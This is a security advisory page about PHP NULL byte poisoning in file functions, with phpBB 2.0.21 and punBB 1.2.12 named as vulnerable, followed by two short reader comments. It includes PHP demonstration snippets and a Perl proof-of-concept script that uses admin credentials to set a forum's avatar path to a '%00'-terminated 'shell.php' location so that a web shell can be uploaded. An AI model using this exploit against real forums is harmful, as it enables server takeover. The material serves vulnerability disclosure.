|
Brought to you by:
Suppliers of:
|
|
|
| |
File operation functions of PHP don't funciton correctly when a NULL byte is used in the filename.
This NULL byte poisoning vulnerability affects different PHP applications. Example of vulnerable applications are phpBB and punBB. |
| |
Credit:
The original article can be found at: http://www.security.nnov.ru/Odocument221.html
|
| |
Vulnerable Systems:
* phpBB version 2.0.21
* punBB version 1.2.12
When a NULL byte is used in a file name some file operating functions of PHP don't work correctly.
For example:
copy('1.jpg', "./dir_for_upload/1.php\0"."/2.jpg");
or
copy('1.jpg', "./dir_for_upload/1.php/\0"."/2.jpg");
will copy 1.jpg to 1.php, same will happens in functions move_uploaded_file() and rename()
Another example:
unlink("./dir_for_upload/1.php\0"."/2.jpg");
will remove file 1.php.
unlink("./dir_for_upload/1.php/\0"."/2.jpg");
Warning: unlink(./dir_for_upload/1.php/) [function.unlink]: Not a directory
Will not remove 1.php.
This vulnerability can be used to upload or replace arbitrary files on server, e.g. PHP scripts, by adding "poison NULL" (%00) to filename.
In case of phpBB and punBB vulnerability can be exploited by changing location of avatar file and uploading avatar file with PHP code in EXIF data.
Proof of concept:
#!/usr/bin/perl -w
use HTTP::Cookies;
use LWP;
use URI::Escape;
unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"}
my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
$ua->cookie_jar( HTTP::Cookies->new());
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
my $req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
my $res = $ua->request($req);
$res=$ua->get('http://'.$ARGV[0].'/login.php');
$content=$res->content;
$content=~ m/true&sid=([^"]+)"/g;
if($ARGV[4]){
$content=$res->content;
print $content;
}
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
if($ARGV[4]){
$content=$res->content;
print $content;
}
|
| Subject:
|
null byte poisoning |
Date: |
12 Sep. 2006 |
| From: |
achtung |
| It's a joke? This kind of attacks are well known since years and years. I don't know what you're trying to do, like getting fame I suppose, but it is pathetic :) |
|
| Subject:
|
Why not report them |
Date: |
27 Sep. 2006 |
| From: |
Sunny |
| IF these attacks still work, why not report them? They should be fixed in the PHP engine, pronto. |
|
|
|
|
|
|
